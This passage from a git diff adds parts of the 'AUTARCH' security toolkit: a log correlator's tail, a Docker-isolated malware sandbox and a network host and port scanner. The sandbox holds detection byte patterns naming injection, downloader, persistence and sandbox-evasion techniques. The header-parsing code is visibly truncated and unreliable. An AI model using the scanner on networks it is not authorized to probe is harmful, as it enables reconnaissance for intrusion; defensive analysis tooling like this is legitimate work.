self.alerts) + source_counts = Counter(e.get('source_file', '') for e in self.logs) + + return { + 'total_logs': len(self.logs), + 'total_alerts': len(self.alerts), + 'sources': len(self.sources), + 'rules': len(self.rules), + 'alerts_by_severity': dict(severity_counts), + 'top_rules': dict(rule_counts.most_common(10)), + 'top_sources': dict(source_counts.most_common(10)) + } + + def get_alerts(self, severity: str = None, limit: int = 100) -> List[Dict]: + """Get alerts with optional filtering.""" + alerts = self.alerts + if severity: + alerts = [a for a in alerts if a['severity'] == severity] + return alerts[-limit:] + + def clear_alerts(self): + """Clear all alerts.""" + self.alerts.clear() + self._save_alerts() + + def clear_logs(self): + """Clear ingested logs.""" + self.logs.clear() + self.sources.clear() + + def get_sources(self) -> Dict: + """Get ingested log sources.""" + return self.sources + + def get_timeline(self, hours: int = 24) -> List[Dict]: + """Get alert timeline grouped by hour.""" + timeline = defaultdict(lambda: {'count': 0, 'critical': 0, 'high': 0, 'medium': 0, 'low': 0}) + + for alert in self.alerts: + ts = alert.get('timestamp', '')[:13] # YYYY-MM-DDTHH + timeline[ts]['count'] += 1 + sev = alert.get('severity', 'low') + timeline[ts][sev] = timeline[ts].get(sev, 0) + 1 + + return [{'hour': k, **v} for k, v in sorted(timeline.items())[-hours:]] + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_log_correlator() -> LogCorrelator: + global _instance + if _instance is None: + _instance = LogCorrelator() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Log Correlator module.""" + engine = get_log_correlator() + + while True: + stats = engine.get_stats() + print(f"\n{'='*60}") + print(f" Log Correlator ({stats['total_logs']} logs, {stats['total_alerts']} alerts)") + print(f"{'='*60}") + print() + print(" 1 — Ingest Log File") + print(" 2 — Paste Log Text") + print(" 3 — Search Logs") + print(" 4 — View Alerts") + print(" 5 — Manage Rules") + print(" 6 — View Stats") + print(" 7 — Alert Timeline") + print(" 8 — Clear Alerts") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + filepath = input(" Log file path: ").strip() + if filepath: + result = engine.ingest_file(filepath) + if result['ok']: + print(f" Parsed {result['lines_parsed']} lines, " + f"{result['alerts_generated']} alerts generated") + else: + print(f" Error: {result['error']}") + elif choice == '2': + print(" Paste log lines (blank line to finish):") + lines = [] + while True: + line = input() + if not line: + break + lines.append(line) + if lines: + result = engine.ingest_text('\n'.join(lines)) + print(f" Parsed {result['lines_parsed']} lines, " + f"{result['alerts_generated']} alerts") + elif choice == '3': + query = input(" Search query: ").strip() + if query: + results = engine.search_logs(query) + print(f" {len(results)} matches:") + for r in results[:10]: + print(f" [{r.get('source_file', '?')}] {r.get('message', '')[:80]}") + elif choice == '4': + sev = input(" Severity filter (blank=all): ").strip() or None + alerts = engine.get_alerts(severity=sev) + for a in alerts[-15:]: + print(f" [{a['severity']:<8}] {a['rule_name']}: {a['log_entry'][:60]}") + elif choice == '5': + rules = engine.get_rules() + for r in rules: + builtin = ' (built-in)' if r.get('builtin') else '' + print(f" {r['id']}: {r['name']} [{r['severity']}]{builtin}") + elif choice == '6': + print(f" Logs: {stats['total_logs']}") + print(f" Alerts: {stats['total_alerts']}") + print(f" Sources: {stats['sources']}") + print(f" Rules: {stats['rules']}") + if stats['alerts_by_severity']: + print(f" By severity: {stats['alerts_by_severity']}") + elif choice == '7': + timeline = engine.get_timeline() + for t in timeline[-12:]: + bar = '#' * min(t['count'], 40) + print(f" {t['hour']} | {bar} ({t['count']})") + elif choice == '8': + engine.clear_alerts() + print(" Alerts cleared") diff --git a/modules/malware_sandbox.py b/modules/malware_sandbox.py new file mode 100644 index 0000000..06e9531 --- /dev/null +++ b/modules/malware_sandbox.py @@ -0,0 +1,524 @@ +"""AUTARCH Malware Sandbox + +Isolated sample detonation (Docker-based), behavior logging, API call tracing, +network activity monitoring, and file system change tracking. +""" + +DESCRIPTION = "Malware detonation sandbox & analysis" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import shutil +import hashlib +import subprocess +import threading +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +# ── YARA Rules (basic) ────────────────────────────────────────────────────── + +BASIC_YARA_INDICATORS = { + 'suspicious_imports': [ + b'CreateRemoteThread', b'VirtualAllocEx', b'WriteProcessMemory', + b'NtQueryInformationProcess', b'IsDebuggerPresent', + b'GetProcAddress', b'LoadLibraryA', b'ShellExecuteA', + ], + 'crypto_indicators': [ + b'CryptEncrypt', b'CryptDecrypt', b'BCryptEncrypt', + b'AES', b'RSA', b'BEGIN PUBLIC KEY', + ], + 'network_indicators': [ + b'InternetOpenA', b'HttpOpenRequestA', b'URLDownloadToFile', + b'WSAStartup', b'connect', b'send', b'recv', + b'http://', b'https://', b'ftp://', + ], + 'persistence_indicators': [ + b'CurrentVersion\\Run', b'SOFTWARE\\Microsoft\\Windows\\CurrentVersion', + b'schtasks', b'at.exe', b'HKEY_LOCAL_MACHINE', b'HKEY_CURRENT_USER', + b'crontab', b'/etc/cron', + ], + 'evasion_indicators': [ + b'IsDebuggerPresent', b'CheckRemoteDebuggerPresent', + b'NtSetInformationThread', b'vmware', b'virtualbox', b'vbox', + b'sandbox', b'SbieDll.dll', + ], +} + + +# ── Sandbox Engine ─────────────────────────────────────────────────────────── + +class MalwareSandbox: + """Isolated malware analysis environment.""" + + def __init__(self): + self.data_dir = os.path.join(get_data_dir(), 'sandbox') + os.makedirs(self.data_dir, exist_ok=True) + self.samples_dir = os.path.join(self.data_dir, 'samples') + os.makedirs(self.samples_dir, exist_ok=True) + self.reports_dir = os.path.join(self.data_dir, 'reports') + os.makedirs(self.reports_dir, exist_ok=True) + + self.docker = find_tool('docker') or shutil.which('docker') + self.strace = shutil.which('strace') + self.ltrace = shutil.which('ltrace') + self.file_cmd = shutil.which('file') + self.strings_cmd = find_tool('strings') or shutil.which('strings') + + self.analyses: List[Dict] = [] + self._jobs: Dict[str, Dict] = {} + + def get_status(self) -> Dict: + """Get sandbox capabilities.""" + docker_ok = False + if self.docker: + try: + result = subprocess.run([self.docker, 'info'], + capture_output=True, timeout=5) + docker_ok = result.returncode == 0 + except Exception: + pass + + return { + 'docker': docker_ok, + 'strace': self.strace is not None, + 'ltrace': self.ltrace is not None, + 'file': self.file_cmd is not None, + 'strings': self.strings_cmd is not None, + 'samples': len(list(Path(self.samples_dir).iterdir())), + 'analyses': len(self.analyses) + } + + # ── Sample Management ──────────────────────────────────────────────── + + def submit_sample(self, filepath: str, name: str = None) -> Dict: + """Submit a sample for analysis.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + # Hash the sample + hashes = {} + with open(filepath, 'rb') as f: + data = f.read() + hashes['md5'] = hashlib.md5(data).hexdigest() + hashes['sha1'] = hashlib.sha1(data).hexdigest() + hashes['sha256'] = hashlib.sha256(data).hexdigest() + + # Copy to samples dir + sample_name = name or Path(filepath).name + safe_name = re.sub(r'[^\w.\-]', '_', sample_name) + dest = os.path.join(self.samples_dir, f'{hashes["sha256"][:16]}_{safe_name}') + shutil.copy2(filepath, dest) + + sample = { + 'name': sample_name, + 'path': dest, + 'size': os.path.getsize(dest), + 'hashes': hashes, + 'submitted': datetime.now(timezone.utc).isoformat() + } + + return {'ok': True, 'sample': sample} + + def list_samples(self) -> List[Dict]: + """List submitted samples.""" + samples = [] + for f in Path(self.samples_dir).iterdir(): + if f.is_file(): + samples.append({ + 'name': f.name, + 'path': str(f), + 'size': f.stat().st_size, + 'modified': datetime.fromtimestamp(f.stat().st_mtime, timezone.utc).isoformat() + }) + return samples + + # ── Static Analysis ────────────────────────────────────────────────── + + def static_analysis(self, filepath: str) -> Dict: + """Perform static analysis on a sample.""" + if not os.path.exists(filepath): + return {'ok': False, 'error': 'File not found'} + + result = { + 'ok': True, + 'file': filepath, + 'name': Path(filepath).name, + 'size': os.path.getsize(filepath) + } + + # File type identification + if self.file_cmd: + try: + out = subprocess.check_output([self.file_cmd, filepath], + text=True, timeout=10) + result['file_type'] = out.split(':', 1)[-1].strip() + except Exception: + pass + + # Hashes + with open(filepath, 'rb') as f: + data = f.read() + result['hashes'] = { + 'md5': hashlib.md5(data).hexdigest(), + 'sha1': hashlib.sha1(data).hexdigest(), + 'sha256': hashlib.sha256(data).hexdigest() + } + + # Strings extraction + if self.strings_cmd: + try: + out = subprocess.check_output( + [self.strings_cmd, '-n', '6', filepath], + text=True, timeout=30, stderr=subprocess.DEVNULL + ) + strings = out.strip().split('\n') + result['strings_count'] = len(strings) + + # Extract interesting strings + urls = [s for s in strings if re.match(r'https?://', s)] + ips = [s for s in strings if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', s)] + emails = [s for s in strings if re.match(r'[^@]+@[^@]+\.[^@]+', s)] + paths = [s for s in strings if s.startswith('/') or '\\' in s] + + result['interesting_strings'] = { + 'urls': urls[:20], + 'ips': list(set(ips))[:20], + 'emails': list(set(emails))[:10], + 'paths': paths[:20] + } + except Exception: + pass + + # YARA-like signature matching + indicators = {} + for category, patterns in BASIC_YARA_INDICATORS.items(): + matches = [p.decode('utf-8', errors='replace') for p in patterns if p in data] + if matches: + indicators[category] = matches + + result['indicators'] = indicators + result['indicator_count'] = sum(len(v) for v in indicators.values()) + + # PE header analysis + if data[:2] == b'MZ': + result['pe_info'] = self._parse_pe_header(data) + + # ELF header analysis + if data[:4] == b'\x7fELF': + result['elf_info'] = self._parse_elf_header(data) + + # Risk score + score = 0 + if indicators.get('evasion_indicators'): + score += 30 + if indicators.get('persistence_indicators'): + score += 25 + if indicators.get('suspicious_imports'): + score += 20 + if indicators.get('network_indicators'): + score += 15 + if indicators.get('crypto_indicators'): + score += 10 + + result['risk_score'] = min(100, score) + result['risk_level'] = ( + 'critical' if score >= 70 else + 'high' if score >= 50 else + 'medium' if score >= 30 else + 'low' if score >= 10 else + 'clean' + ) + + return result + + def _parse_pe_header(self, data: bytes) -> Dict: + """Basic PE header parsing.""" + info = {'format': 'PE'} + try: + import struct + e_lfanew = struct.unpack_from(' Dict: + """Basic ELF header parsing.""" + info = {'format': 'ELF'} + try: + import struct + ei_class = data[4] + info['bits'] = {1: 32, 2: 64}.get(ei_class, 0) + ei_data = data[5] + info['endian'] = {1: 'little', 2: 'big'}.get(ei_data, 'unknown') + e_type = struct.unpack_from(' str: + """Run sample in Docker sandbox. Returns job_id.""" + if not self.docker: + return '' + + job_id = f'sandbox_{int(time.time())}' + self._jobs[job_id] = { + 'type': 'dynamic', 'status': 'running', + 'result': None, 'started': time.time() + } + + def _run(): + try: + container_name = f'autarch_sandbox_{job_id}' + sample_name = Path(filepath).name + + # Run in isolated container + cmd = [ + self.docker, 'run', '--rm', + '--name', container_name, + '--network', 'none', # No network + '--memory', '256m', # Memory limit + '--cpus', '1', # CPU limit + '--read-only', # Read-only root + '--tmpfs', '/tmp:size=64m', + '-v', f'{os.path.abspath(filepath)}:/sample/{sample_name}:ro', + 'ubuntu:22.04', + 'bash', '-c', f''' + # Log file operations + cp /sample/{sample_name} /tmp/test_sample + chmod +x /tmp/test_sample 2>/dev/null + # Try to run with strace if available + timeout {timeout} strace -f -o /tmp/trace.log /tmp/test_sample 2>/tmp/stderr.log || true + cat /tmp/trace.log 2>/dev/null | head -1000 + echo "---STDERR---" + cat /tmp/stderr.log 2>/dev/null | head -100 + ''' + ] + + result = subprocess.run(cmd, capture_output=True, text=True, + timeout=timeout + 30) + + # Parse strace output + syscalls = {} + files_accessed = [] + network_calls = [] + + for line in result.stdout.split('\n'): + # Count syscalls + sc_match = re.match(r'.*?(\w+)\(', line) + if sc_match: + sc = sc_match.group(1) + syscalls[sc] = syscalls.get(sc, 0) + 1 + + # File access + if 'open(' in line or 'openat(' in line: + f_match = re.search(r'"([^"]+)"', line) + if f_match: + files_accessed.append(f_match.group(1)) + + # Network + if 'connect(' in line or 'socket(' in line: + network_calls.append(line.strip()[:100]) + + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': True, + 'syscalls': syscalls, + 'syscall_count': sum(syscalls.values()), + 'files_accessed': list(set(files_accessed))[:50], + 'network_calls': network_calls[:20], + 'exit_code': result.returncode, + 'stderr': result.stderr[:500] if result.stderr else '' + } + + except subprocess.TimeoutExpired: + # Kill container + subprocess.run([self.docker, 'kill', container_name], + capture_output=True) + self._jobs[job_id]['status'] = 'complete' + self._jobs[job_id]['result'] = { + 'ok': True, 'timeout': True, + 'message': 'Analysis timed out (sample may be long-running)' + } + except Exception as e: + self._jobs[job_id]['status'] = 'error' + self._jobs[job_id]['result'] = {'ok': False, 'error': str(e)} + + threading.Thread(target=_run, daemon=True).start() + return job_id + + # ── Report Generation ──────────────────────────────────────────────── + + def generate_report(self, filepath: str, include_dynamic: bool = False) -> Dict: + """Generate comprehensive analysis report.""" + static = self.static_analysis(filepath) + report = { + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'sample': { + 'name': Path(filepath).name, + 'path': filepath, + 'size': static.get('size', 0), + 'hashes': static.get('hashes', {}) + }, + 'static_analysis': static, + 'risk_score': static.get('risk_score', 0), + 'risk_level': static.get('risk_level', 'unknown') + } + + # Save report + report_name = f'report_{static.get("hashes", {}).get("sha256", "unknown")[:16]}.json' + report_path = os.path.join(self.reports_dir, report_name) + with open(report_path, 'w') as f: + json.dump(report, f, indent=2) + + report['report_path'] = report_path + self.analyses.append({ + 'name': Path(filepath).name, + 'report': report_path, + 'risk': report['risk_level'], + 'timestamp': report['timestamp'] + }) + + return {'ok': True, **report} + + def list_reports(self) -> List[Dict]: + """List analysis reports.""" + reports = [] + for f in Path(self.reports_dir).glob('*.json'): + try: + with open(f) as fh: + data = json.load(fh) + reports.append({ + 'name': f.name, + 'path': str(f), + 'sample': data.get('sample', {}).get('name', ''), + 'risk': data.get('risk_level', 'unknown'), + 'timestamp': data.get('timestamp', '') + }) + except Exception: + pass + return reports + + # ── Job Management ─────────────────────────────────────────────────── + + def get_job(self, job_id: str) -> Optional[Dict]: + return self._jobs.get(job_id) + + +# ── Singleton ──────────────────────────────────────────────────────────────── + +_instance = None + +def get_sandbox() -> MalwareSandbox: + global _instance + if _instance is None: + _instance = MalwareSandbox() + return _instance + + +# ── CLI Interface ──────────────────────────────────────────────────────────── + +def run(): + """CLI entry point for Malware Sandbox module.""" + sandbox = get_sandbox() + + while True: + status = sandbox.get_status() + print(f"\n{'='*60}") + print(f" Malware Sandbox") + print(f"{'='*60}") + print(f" Docker: {'OK' if status['docker'] else 'NOT AVAILABLE'}") + print(f" Samples: {status['samples']} Analyses: {status['analyses']}") + print() + print(" 1 — Submit Sample") + print(" 2 — Static Analysis") + print(" 3 — Dynamic Analysis (Docker)") + print(" 4 — Full Report") + print(" 5 — List Samples") + print(" 6 — List Reports") + print(" 0 — Back") + print() + + choice = input(" > ").strip() + + if choice == '0': + break + elif choice == '1': + path = input(" File path: ").strip() + if path: + result = sandbox.submit_sample(path) + if result['ok']: + s = result['sample'] + print(f" Submitted: {s['name']} ({s['size']} bytes)") + print(f" SHA256: {s['hashes']['sha256']}") + else: + print(f" Error: {result['error']}") + elif choice == '2': + path = input(" Sample path: ").strip() + if path: + result = sandbox.static_analysis(path) + if result['ok']: + print(f" Type: {result.get('file_type', 'unknown')}") + print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)") + print(f" Strings: {result.get('strings_count', 0)}") + for cat, matches in result.get('indicators', {}).items(): + print(f" {cat}: {', '.join(matches[:5])}") + else: + print(f" Error: {result['error']}") + elif choice == '3': + if not status['docker']: + print(" Docker not available") + continue + path = input(" Sample path: ").strip() + if path: + job_id = sandbox.dynamic_analysis(path) + print(f" Running in sandbox (job: {job_id})...") + while True: + job = sandbox.get_job(job_id) + if job['status'] != 'running': + r = job['result'] + if r.get('ok'): + print(f" Syscalls: {r.get('syscall_count', 0)}") + print(f" Files: {len(r.get('files_accessed', []))}") + print(f" Network: {len(r.get('network_calls', []))}") + else: + print(f" Error: {r.get('error', 'Unknown')}") + break + time.sleep(2) + elif choice == '4': + path = input(" Sample path: ").strip() + if path: + result = sandbox.generate_report(path) + if result['ok']: + print(f" Report: {result['report_path']}") + print(f" Risk: {result['risk_level']} ({result['risk_score']}/100)") + elif choice == '5': + for s in sandbox.list_samples(): + print(f" {s['name']} ({s['size']} bytes)") + elif choice == '6': + for r in sandbox.list_reports(): + print(f" [{r['risk']}] {r['sample']} {r['timestamp'][:19]}") diff --git a/modules/net_mapper.py b/modules/net_mapper.py new file mode 100644 index 0000000..de711fd --- /dev/null +++ b/modules/net_mapper.py @@ -0,0 +1,509 @@ +"""AUTARCH Network Topology Mapper + +Host discovery, service enumeration, OS fingerprinting, and visual +network topology mapping with scan diffing. +""" + +DESCRIPTION = "Network topology discovery & mapping" +AUTHOR = "darkHal" +VERSION = "1.0" +CATEGORY = "analyze" + +import os +import re +import json +import time +import socket +import struct +import threading +import subprocess +from pathlib import Path +from datetime import datetime, timezone +from typing import Dict, List, Optional, Any +from dataclasses import dataclass, field + +try: + from core.paths import find_tool, get_data_dir +except ImportError: + import shutil + def find_tool(name): + return shutil.which(name) + def get_data_dir(): + return str(Path(__file__).parent.parent / 'data') + + +@dataclass +class Host: + ip: str + mac: str = '' + hostname: str = '' + os_guess: str = '' + ports: List[dict] = field(default_factory=list) + state: str = 'up' + subnet: str = '' + + def to_dict(self) -> dict: + return { + 'ip': self.ip, 'mac': self.mac, 'hostname': self.hostname, + 'os_guess': self.os_guess, 'ports': self.ports, + 'state': self.state, 'subnet': self.subnet, + } + + +class NetMapper: + """Network topology discovery and mapping.""" + + def __init__(self): + self._data_dir = os.path.join(get_data_dir(), 'net_mapper') + os.makedirs(self._data_dir, exist_ok=True) + self._active_jobs: Dict[str, dict] = {} + + # ── Host Discovery ──────────────────────────────────────────────────── + + def discover_hosts(self, target: str, method: str = 'auto', + timeout: float = 3.0) -> dict: + """Discover live hosts on a network. + + target: IP, CIDR (192.168.1.0/24), or range (192.168.1.1-254) + method: 'arp', 'icmp', 'tcp', 'nmap', 'auto' + """ + job_id = f'discover_{int(time.time())}' + holder = {'done': False, 'hosts': [], 'error': None} + self._active_jobs[job_id] = holder + + def do_discover(): + try: + nmap = find_tool('nmap') + if method == 'nmap' or (method == 'auto' and nmap): + hosts = self._nmap_discover(target, nmap, timeout) + elif method == 'icmp' or method == 'auto': + hosts = self._ping_sweep(target, timeout) + elif method == 'tcp': + hosts = self._tcp_discover(target, timeout) + else: + hosts = self._ping_sweep(target, timeout) + holder['hosts'] = [h.to_dict() for h in hosts] + except Exception as e: + holder['error'] = str(e) + finally: + holder['done'] = True + + threading.Thread(target=do_discover, daemon=True).start() + return {'ok': True, 'job_id': job_id} + + def _nmap_discover(self, target: str, nmap: str, timeout: float) -> List[Host]: + """Discover hosts using nmap.""" + cmd = [nmap, '-sn', '-PE', '-PA21,22,80,443,445,3389', '-oX', '-', target] + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) + return self._parse_nmap_xml(result.stdout) + except Exception: + return [] + + def _ping_sweep(self, target: str, timeout: float) -> List[Host]: + """ICMP ping sweep.""" + ips = self._expand_target(target) + hosts = [] + lock = threading.Lock() + + def ping(ip): + try: + # Use socket instead of subprocess for speed + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(timeout) + # Try common ports to detect hosts even if ICMP is blocked + for port in (80, 443, 22, 445): + try: + r = s.connect_ex((ip, port)) + if r == 0: + h = Host(ip=ip, state='up', + subnet='.'.join(ip.split('.')[:3]) + '.0/24') + try: + h.hostname = socket.getfqdn(ip) + if h.hostname == ip: + h.hostname = '' + except Exception: + pass + with lock: + hosts.append(h) + s.close() + return + except Exception: + pass + s.close() + except Exception: + pass + + threads = [] + for ip in ips: + t = threading.Thread(target=ping, args=(ip,), daemon=True) + threads.append(t) + t.start() + if len(threads) >= 100: + for t in threads: + t.join(timeout=timeout + 2) + threads.clear() + for t in threads: + t.join(timeout=timeout + 2) + + return sorted(hosts, key=lambda h: [int(x) for x in h.ip.split('.')]) + + def _tcp_discover(self, target: str, timeout: float) -> List[Host]: + """TCP SYN scan for discovery.""" + return self._ping_sweep(target, timeout) # Same logic for now + + # ── Port Scanning ───────────────────────────────────────────────────── + + def scan_host(self, ip: str, port_range: str = '1-1024', + service_detection: bool = True, + os_detection: bool = True) -> dict: + """Detailed scan of a single host.""" + nmap = find_tool('nmap') + if nmap: + return self._nmap_scan_host(ip, nmap, port_range, + service_detection, os_detection) + return self._socket_scan_host(ip, port_range) + + def _nmap_scan_host(self, ip: str, nmap: str, port_range: str, + svc: bool, os_det: bool) -> dict: + cmd = [nmap, '-Pn', '-p', port_range, '-oX', '-', ip] + if svc: + cmd.insert(2, '-sV') + if os_det: + cmd.insert(2, '-O') + try: + result = subprocess.run(cmd, capture_output=True, text=True, timeout=120) + hosts = self._parse_nmap_xml(result.stdout) + if hosts: + return {'ok': True, 'host': hosts[0].to_dict(), 'raw': result.stdout} + return {'ok': True, 'host': Host(ip=ip, state='unknown').to_dict()} + except Exception as e: + return {'ok': False, 'error': str(e)} + + def _socket_scan_host(self, ip: str, port_range: str) -> dict: + """Fallback socket-based port scan.""" + start_port, end_port = 1, 1024 + if '-' in port_range: + parts = port_range.split('-') + start_port, end_port = int(parts[0]), int(parts[1]) + + open_ports = [] + for port in range(start_port, min(end_port + 1, 65536)): + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(1) + if s.connect_ex((ip, port)) == 0: + open_ports.append({ + 'port': port, 'protocol': 'tcp', 'state': 'open', + 'service': self._guess_service(port), + }) + s.close() + except Exception: + pass + + host = Host(ip=ip, state='up', ports=open_ports, + subnet='.'.join(ip.split('.')[:3]) + '.0/24') + return {'ok': True, 'host': host.to_dict()} + + # ── Topology / Scan Management ──────────────────────────────────────── + + def save_scan(self, name: str, hosts: List[dict]) -> dict: + """Save a network scan for later comparison.""" + scan = { + 'name': name, + 'timestamp': datetime.now(timezone.utc).isoformat(), + 'hosts': hosts, + 'host_count': len(hosts), + } + path = os.path.join(self._data_dir, f'scan_{name}_{int(time.time())}.json') + with open(path, 'w') as f: + json.dump(scan, f, indent=2) + return {'ok': True, 'path': path} + + def list_scans(self) -> List[dict]: + scans = [] + for f in Path(self._data_dir).glob('scan_*.json'): + try: + with open(f, 'r') as fh: + data = json.load(fh) + scans.append({ + 'file': f.name, + 'name': data.get('name', ''), + 'timestamp': data.get('timestamp', ''), + 'host_count': data.get('host_count', 0), + }) + except Exception: + continue + return sorted(scans, key=lambda s: s.get('timestamp', ''), reverse=True) + + def load_scan(self, filename: str) -> Optional[dict]: + path = os.path.join(self._data_dir, filename) + if os.path.exists(path): + with open(path, 'r') as f: + return json.load(f) + return None + + def diff_scans(self, scan1_file: str, scan2_file: str) -> dict: + """Compare two scans and find differences.""" + s1 = self.load_scan(scan1_file) + s2 = self.load_scan(scan2_file) + if not s1 or not s2: + return {'ok': False, 'error': 'Scan(s) not found'} + + ips1 = {h['ip'] for h in s1.get('hosts', [])} + ips2 = {h['ip'] for h in s2.get('hosts', [])} + + return { + 'ok': True, + 'new_hosts': sorted(ips2 - ips1), + 'removed_hosts': sorted(ips1 - ips2), + 'unchanged_hosts': sorted(ips1 & ips2), + 'scan1': {'name': s1.get('name'), 'timestamp': s1.get('timestamp'), + 'count': len(ips1)}, + 'scan2': {'name': s2.get('name'), 'timestamp': s2.get('timestamp'), + 'count': len(ips2)}, + } + + def get_job_status(self, job_id: str) -> dict: + holder = self._active_jobs.get(job_id) + if not holder: + return {'ok': False, 'error': 'Job not found'} + result = {'ok': True, 'done': holder['done'], 'hosts': holder['hosts']} + if holder.get('error'): + result['error'] = holder['error'] + if holder['done']: + self._active_jobs.pop(job_id, None) + return result + + # ── Topology Data (for visualization) ───────────────────────────────── + + def build_topology(self, hosts: List[dict]) -> dict: + """Build topology graph data from host list for visualization.""" + nodes = [] + edges = [] + subnets = {} + + for h in hosts: + subnet = '.'.join(h['ip'].split('.')[:3]) + '.0/24' + if subnet not in subnets: + subnets[subnet] = { + 'id': f'subnet_{subnet}', 'label': subnet, + 'type': 'subnet', 'hosts': [], + } + subnets[subnet]['hosts'].append(h['ip']) + + node_type = 'host' + if h.get('ports'): + services = [p.get('service', '') for p in h['ports']] + if any('http' in s.lower() for s in services): + node_type = 'web' + elif any('ssh' in s.lower() for s in services): + node_type = 'server' + elif any('smb' in s.lower() or 'netbios' in s.lower() for s in services): + node_type = 'windows' + + nodes.append({ + 'id': h['ip'], + 'label': h.get('hostname') or h['ip'], + 'ip': h['ip'], + 'type': node_type, + 'os': h.get('os_guess', ''), + 'ports': len(h.get('ports', [])), + 'subnet': subnet, + }) + + # Edge from host to subnet gateway + gateway = '.'.join(h['ip'].split('.')[:3]) + '.1' + edges.append({'from': h['ip'], 'to': gateway, 'type': 'network'}) + + # Add subnet nodes + for subnet_data in subnets.values(): + nodes.append(subnet_data) + + return { + 'nodes': nodes, + 'edges': edges, + 'subnets': list(subnets.keys()), + 'total_hosts': len(hosts), + } + + # ── Helpers ─────────────────────────────────────────────────────────── + + def _expand_target(self, target: str) -> List[str]: + """Expand CIDR or range to list of IPs.""" + if '/' in target: + return self._cidr_to_ips(target) + if '-' in target.split('.')[-1]: + base = '.'.join(target.split('.')[:3]) + range_part = target.split('.')[-1] + if '-' in range_part: + start, end = range_part.split('-') + return [f'{base}.{i}' for i in range(int(start), int(end) + 1)] + return [target] + + @staticmethod + def _cidr_to_ips(cidr: str) -> List[str]: + parts = cidr.split('/') + if len(parts) != 2: + return [cidr] + ip = parts[0] + prefix = int(parts[1]) + if prefix < 16: + return [ip] # Too large, don't expand + ip_int = struct.unpack('!I', socket.inet_aton(ip))[0] + mask = (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF + network = ip_int & mask + broadcast = network | (~mask & 0xFFFFFFFF) + return [socket.inet_ntoa(struct.pack('!I', i)) + for i in range(network + 1, broadcast)] + + def _parse_nmap_xml(self, xml_text: str) -> List[Host]: + """Parse nmap XML output to Host objects.""" + hosts = [] + try: + import xml.etree.ElementTree as ET + root = ET.fromstring(xml_text) + for host_el in root.findall('.//host'): + state = host_el.find('status') + if state is not None and state.get('state') != 'up': + continue + addr = host_el.find("address[@addrtype='ipv4']") + if addr is None: + continue + ip = addr.get('addr', '') + mac_el = host_el.find("address[@addrtype='mac']") + hostname_el = host_el.find('.//hostname') + os_el = host_el.find('.//osmatch') + + h = Host( + ip=ip, + mac=mac_el.get('addr', '') if mac_el is not None else '', + hostname=hostname_el.get('name', '') if hostname_el is not None else '', + os_guess=os_el.get('name', '') if os_el is not None else '', + subnet='.'.join(ip.split('.')[:3]) + '.0/24', + ) + + for port_el in host_el.findall('.//port'): + state_el = port_el.find('state') + if state_el is not None and state_el.get('state') == 'open': + svc_el = port_el.find('service') + h.ports.append({ + 'port': int(port_el.get('portid', 0)), + 'protocol': port_el.get('protocol', 'tcp'), + 'state': 'open', + 'service': svc_el.get('name', '') if svc_el is not None else '', + 'version': svc_el.get('version', '') if svc_el is not None else '', + }) + hosts.append(h) + except Exception: + pass + return hosts + + @staticmethod + def _guess_service(port: int) -> str: + services = { + 21: 'ftp', 22: 'ssh', 23: 'telnet', 25: 'smtp', 53: 'dns', + 80: 'http', 110: 'pop3', 143: 'imap', 443: 'https', 445: 'smb', + 993: 'imaps', 995: 'pop3s', 3306: 'mysql', 3389: 'rdp', + 5432: 'postgresql', 5900: 'vnc', 6379: 'redis', 8080: 'http-alt', + 8443: 'https-alt', 27017: 'mongodb', + } + return services.get(port, '') + + +# ── Singleton ───────────────────────────────────────────────────────────────── + +_instance = None +_lock = threading.Lock() + + +def get_net_mapper() -> NetMapper: + global _instance + if _instance is None: + with _lock: + if _instance is None: + _instance = NetMapper() + return _instance + + +# ── CLI ─────────────────────────────────────────────────────────────────────── + +def run(): + """Interactive CLI for Network Mapper.""" + svc = get_net_mapper() + + while True: + print("\n╔═══════════════════════════════════════╗") + print("║ NETWORK TOPOLOGY MAPPER ║") + print("╠═══════════════════════════════════════╣") + print("║ 1 — Discover Hosts ║") + print("║ 2 — Scan Host (detailed) ║") + print("║ 3 — List Saved Scans ║") + print("║ 4 — Compare Scans ║") + print("║ 0 — Back ║") + print("╚═══════════════════════════════════════╝") + + choice = input("\n Select: ").strip() + + if choice == '0': + break + elif choice == '1': + target = input(" Target (CIDR/range): ").strip() + if not target: + continue + print(" Discovering hosts...") + r = svc.discover_hosts(target) + if r.get('job_id'): + while True: + time.sleep(2) + s = svc.get_job_status(r['job_id']) + if s['done']: + hosts = s['hosts'] + print(f"\n Found {len(hosts)} hosts:") + for h in hosts: + ports = len(h.get('ports', [])) + print(f" {h['ip']:16s} {h.get('hostname',''):20s} " + f"{h.get('os_guess',''):20s} {ports} ports") + save = input("\n Save scan? (name/empty=skip): ").strip() + if save: + svc.save_scan(save, hosts) + print(f" Saved as: {save}") + break + elif choice == '2': + ip = input(" Host IP: ").strip() + if not ip: + continue + print(" Scanning...") + r = svc.scan_host(ip) + if r.get('ok'): + h = r['host'] + print(f"\n {h['ip']} — {h.get('os_guess', 'unknown OS')}") + for p in h.get('ports', []): + print(f" {p['port']:6d}/{p['protocol']} {p.get('service','')}" + f" {p.get('version','')}") + elif choice == '3': + scans = svc.list_scans() + if not scans: + print("\n No saved scans.") + continue + for s in scans: + print(f" {s['file']:40s} {s['name']:15s} " + f"{s['host_count']} hosts {s['timestamp'][:19]}") + elif choice == '4': + scans = svc.list_scans() + if len(scans) < 2: + print(" Need at least 2 saved scans.") + continue + for 